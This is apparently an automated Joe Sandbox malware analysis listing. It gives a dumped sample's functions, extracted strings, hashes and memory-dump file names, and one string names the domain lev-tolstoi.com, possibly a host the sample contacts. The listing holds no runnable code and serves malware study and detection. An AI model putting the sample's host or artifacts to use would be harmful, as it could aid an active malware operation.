Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: M/($M/(
API String ID: 237503144-1710806632
Opcode ID: ece6ec79887c120c60c2f1f7c684e2f7405b945edf04be88d82bf39db59bb745
Instruction ID: 6a4a0e9b855c9e4361ad09ab51b143f13e48ea7f4eeaaa3827853a7f2b4e5e0a
Opcode Fuzzy Hash: ece6ec79887c120c60c2f1f7c684e2f7405b945edf04be88d82bf39db59bb745
Instruction Fuzzy Hash: 3C21437164C3115FEB10CE38988179FBBAAEBC2700F01892CE0D1DB1C5D674880B8752

Function 0019A5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

VN, xrefs: 0019A5C6
i, xrefs: 0019A5CD
VN, xrefs: 0019A520
i, xrefs: 0019A527

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: VN$VN$i$i
API String ID: 0-1885346908
Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction ID: 7d0796053d58865bdff6086b27bf0f629486ad8f238970d5059b549bb877f3c4
Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction Fuzzy Hash: 2E21C62164C3818BE7058E6580402A6BBE3AFC6718F6A465ED1F15B391E737C90D4797

Function 0019A0CA Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

<\hX, xrefs: 0019A236
.txt, xrefs: 0019A371
_^]\, xrefs: 0019A49C, 0019A188

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: .txt$<\hX$_^]\
API String ID: 0-3117400391
Opcode ID: 40246221279e0d8c9bd495874c027b87e4396ead69fe1a14ec7daa5cdcf77392
Instruction ID: 64eb71af30c99d9c88903092a2aaf996bc338cc676e5dafa40a57af1f5958a29
Opcode Fuzzy Hash: 40246221279e0d8c9bd495874c027b87e4396ead69fe1a14ec7daa5cdcf77392
Instruction Fuzzy Hash: E3C1207160C341DFDB089F28D89166ABBE2AFC5310F588A6CF095472E2D7359989CB93

Function 0017D4F3 Relevance: 4.0, Strings: 3, Instructions: 295COMMON

Download Yara Rule

Strings

Fm, xrefs: 0017D6DD
lev-tolstoi.com, xrefs: 0017D819
V], xrefs: 0017D6E4

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: Fm$V]$lev-tolstoi.com
API String ID: 0-1622397547
Opcode ID: 7e204d4b906df2ae5bb9f49507ba785ff22c50e6434a82cd0ad568695e532cb8
Instruction ID: 088371d67eed65a960bf25ee0ca56afac20dd217cf8b8e0638b632f85b7e3f10
Opcode Fuzzy Hash: 7e204d4b906df2ae5bb9f49507ba785ff22c50e6434a82cd0ad568695e532cb8
Instruction Fuzzy Hash: 5C91BEB62557408FD325CF29D480656BFB2EF9631872DC69CD0994F766C33AA807CB90

Function 0018D003 Relevance: 3.4, Strings: 2, Instructions: 883COMMON

Download Yara Rule

Strings

[V, xrefs: 0018D4DD
bh, xrefs: 0018D4D6

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: [V$bh
API String ID: 0-2174178241
Opcode ID: 55588c50af0497ec808f367227a6cb3a984a8f02625d81282204aaa5ff9303e2
Instruction ID: f21def5453f79f510f3020017cd20da3074d40fe0f1316c820ea619db05771f9
Opcode Fuzzy Hash: 55588c50af0497ec808f367227a6cb3a984a8f02625d81282204aaa5ff9303e2
Instruction Fuzzy Hash: 4E3249B1901712CBCB24DF28C8926B7B7B1FFA5310F18825DD8969B7D4E734A941CB91

Function 0020B6F4 Relevance: 3.0, Strings: 2, Instructions: 488COMMON

Download Yara Rule

Strings

`ezN, xrefs: 0020BCCE
}~, xrefs: 0020BAEC

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: `ezN$}~
API String ID: 0-2139496915
Opcode ID: 677130a00c93fbd69ef74160dc61790443991e338e20b8621b666327eefa0680
Instruction ID: 3f3da8801312162e65c1e90fdf383e6dc9e0412075f1225a7d6bd1652e66b220
Opcode Fuzzy Hash: 677130a00c93fbd69ef74160dc61790443991e338e20b8621b666327eefa0680
Instruction Fuzzy Hash: E0F1CFF3F156104BF3445E29DC49366B692EBD4320F2F863C9A88AB7C4E97D9D0A4385

Function 0018961B Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

&, xrefs: 001897D7
wt, xrefs: 001898CB

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: &$wt
API String ID: 0-2890898390
Opcode ID: d0eeeb6d92b154765e67119954065f5078eaf4a4ecc7028abd2b56399f3bf6ac
Instruction ID: aba45185bc5af1a6d2ac3d029ea8b18dab360adf363cc5b082a4d072a1b19829
Opcode Fuzzy Hash: d0eeeb6d92b154765e67119954065f5078eaf4a4ecc7028abd2b56399f3bf6ac
Instruction Fuzzy Hash: 33815A716083408BD725DF28C4516BB77E1FFDA324F185A1CE4DA8B291E7348905CB96

Function 00174270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 001742EB
IEND, xrefs: 00174661

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 9e40d331999f23e51303112a6cef287ac613c876cd58c27d0a97b308e509e7a0
Instruction ID: eea30893fe98e027d6b10cf02e05f9f8b7f333334a0bed042e2f87f8bc78782f
Opcode Fuzzy Hash: 9e40d331999f23e51303112a6cef287ac613c876cd58c27d0a97b308e509e7a0
Instruction Fuzzy Hash: 9FD18DB1908344DFE720CF28D845B5ABBF4AB95304F14892DF99D9B382D775E908CB92

Function 00199739 Relevance: 2.8, Strings: 2, Instructions: 308COMMON

Download Yara Rule

Strings

,7, xrefs: 00199786
(. 7, xrefs: 0019977E

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: (. 7$,7
API String ID: 0-1315767106
Opcode ID: 79b56bf3f06ae6e2f6b2950d6b2009ba164fc2cd6879f08b154c0824cf90f0e7
Instruction ID: 19a16fb5a395215d189d520a7794078a04dafbb43d3bf219f8c01fe7200548f8
Opcode Fuzzy Hash: 79b56bf3f06ae6e2f6b2950d6b2009ba164fc2cd6879f08b154c0824cf90f0e7
Instruction Fuzzy Hash: D9A1DEB150C3419FCB14DF28C89262BBBE2EFD5310F15892CF4968B292E734D841CB92

Function 0019E180 Relevance: 2.0, Strings: 1, Instructions: 710COMMON

Download Yara Rule

Strings

, xrefs: 0019E191, 0019E4F2, 0019E54F, 0019E580, 0019E5B1, 0019E5F8, 0019E63F, 0019E69C, 0019E6E3, 0019E756, 0019E79D, 0019E7B8, 0019E7FF, 0019E81A, 0019E877, 0019E8A8, 0019E8C3, 0019E920, 0019E94B, 0019E992, 0019E9C3, 0019E9DE, 0019EA25, 0019EA40, 0019EA71, 0019EAB8, 0019EAD3, 0019EAEE, 0019EB09, 0019EB24, 0019EB3F, 0019EB5A, 0019EB75, 0019EB90, 0019EBAB, 0019EBC6, 0019EBE1, 0019EBFC, 0019EC17, 0019EC32, 0019EC4D, 0019EC68, 0019EC83, 0019EC9E

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID: 0-2740779761
Opcode ID: c1a80b193e48f1b613c4d510480cb5d8cb0ac6644405948e5361fd285323afd8
Instruction ID: 535a1705eda6d0cdc83734bc459980fa9ff2ba0230cdc453cfb4d2e24eed88b6
Opcode Fuzzy Hash: c1a80b193e48f1b613c4d510480cb5d8cb0ac6644405948e5361fd285323afd8
Instruction Fuzzy Hash: 6762AFF1511B019FC3A0CF2AC981B93BBEDAB89754F14491EE1AE97351CBB06541CFA2

Function 0022E0AB Relevance: 1.8, Strings: 1, Instructions: 532COMMON

Download Yara Rule

Strings

M, xrefs: 0022E7A2

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-876588039
Opcode ID: 1fbd3e06f82254a765f006d0bfde2f558e61386dbd863f66d38c25324555162f
Instruction ID: f8c1b49e02858e9d977521fe0e47183ccad3b3e21d2a733c170a4ab81b523990
Opcode Fuzzy Hash: 1fbd3e06f82254a765f006d0bfde2f558e61386dbd863f66d38c25324555162f
Instruction Fuzzy Hash: 8D02B9F3F112144BF3445E29DC99366B682EBD4320F2F823D9B99977C4E97E9C064285

Function 001FA457 Relevance: 1.7, Strings: 1, Instructions: 486COMMON

Download Yara Rule

Strings

a[~g, xrefs: 001FA8C3

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: a[~g
API String ID: 0-2690461352
Opcode ID: 15f17663bc75325daebf2a793aea5c6413d68b250f710121e1cdecdc377e555f
Instruction ID: 48490c9e55c4ae72b2689c7ca40b2ee45be32fc4d4fd49e1ca61518d0a643ba6
Opcode Fuzzy Hash: 15f17663bc75325daebf2a793aea5c6413d68b250f710121e1cdecdc377e555f
Instruction Fuzzy Hash: B0F1C4B3E142148BF3505D39DC85366B692EB94320F2B863DCED8A77C4D93E9D098785

Function 001F1158 Relevance: 1.7, Strings: 1, Instructions: 467COMMON

Download Yara Rule

Strings

T\eo, xrefs: 001F172A

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: T\eo
API String ID: 0-3305796374
Opcode ID: 83012360638a6705e108a8d80948d15fdec7161ab0a52ec811aaaef09ff0121c
Instruction ID: 5abe90ead9754d42ec56c0c406098196b5ebd0d74d35a5857c7d7dfaa1bc500f
Opcode Fuzzy Hash: 83012360638a6705e108a8d80948d15fdec7161ab0a52ec811aaaef09ff0121c
Instruction Fuzzy Hash: E2E1BEF3F146204BF3484A79DCA83667692EB94324F2F823DCA999B7C4D97E5C094384

Function 002036B7 Relevance: 1.7, Strings: 1, Instructions: 451COMMON

Download Yara Rule

Strings

c4 H, xrefs: 00203CD9

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: c4 H
API String ID: 0-3325437885
Opcode ID: 84047d24058d11ca548cc13f3d30c315304095b493b4e6e6977faa80e1cd1f6f
Instruction ID: 1cd2d2d7959023ed04274b8c89690f42c4c0a5208d95d854d650a081b5c947da
Opcode Fuzzy Hash: 84047d24058d11ca548cc13f3d30c315304095b493b4e6e6977faa80e1cd1f6f
Instruction Fuzzy Hash: 08E1CDB3F146254BF3588D29CC98366B6D6EBD4310F2B813C9E89A77C4D97E5C0A4385

Function 001F475C Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

B;z, xrefs: 001F4CBE

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
